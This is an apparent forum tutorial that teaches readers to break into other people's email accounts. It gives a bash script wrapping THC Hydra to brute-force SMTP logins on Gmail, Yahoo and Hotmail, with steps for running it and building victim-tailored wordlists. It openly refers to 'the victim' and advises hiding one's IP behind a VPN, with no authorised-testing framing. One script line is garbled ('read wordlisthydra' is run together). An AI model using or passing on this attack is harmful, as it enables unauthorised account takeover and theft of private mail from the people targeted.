the victim then we can do any thing what every we want so today we are
going to learn how to hack email anonymously by the help of brute force
attack just follow the given steps so you can also perform this attack very
easily.So now we will be focusing on brute forcing email, or more specifically,
SMTP, also known as the Simple Mail Transfer Protocol. It is your
standard protocol for sending electronic mail to the peoples.
Requirments- updated kali linux operating system
Good fast internet connection
Your system ip should be chanded and use good vpn.
Step1- Let's open Leafpad, or your text editing program of your choice
- image.EXFL91.png (67.66 KiB) Viewed 7768 times
Step2- Bash time
We are going to write a little bit of script, so that we can save some time
instead of going through the hassle of actually typing out parameters.
On Leafpad, type:
#! /bin/bash
echo Simple Email Cracking Script in bash
echo Written By: Alan Cao
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com /
Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlisthydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
And after doing this all just, save it as anything you want, but with .sh at the end. Make sure it is
in the root directory. Not on your desktop, but in /root. ( must important)
- 635698763607248841.jpg (95.97 KiB) Viewed 7768 times
Now, I am going to explain how the script works.
#! /bin/bash simply means that everything is in bash.
echo simply means to tell the computer to say something.
read is asking for user input. this will then store your input into a variable. read email would
mean for you to enter something, and it will be stored into the email.
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which
will help brute-force the email address. As you may tell, there are some parameters with a $.
This is the variable with stored values you previously input in the read command.
Step3- permission
The file you have saved (in root, right?) only has read and write permissions. This means you
cannot execute it. So just follow this step to execute
open up Terminal. Type in
chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the bash
file)
- 635698766013186350.jpg (66.05 KiB) Viewed 7768 times
Step4- Execute!
Now we can finally use it!
In terminal,type
./yourscript.sh
- 635698767691622626.jpg (85.4 KiB) Viewed 7768 times
It's working!
The script is self-explanatory. Type in the SMTP service of the target's email, where
smtp.gmail.com is Gmail. After that, you just provide the gmail account,[email protected] and give a wordlist directory, which you can find some default ones in the
/usr/share/wordlists directory, or you can create your own with Crunch or CUPP. It is better to
create a own wordlist but basically it is depend on your victim.
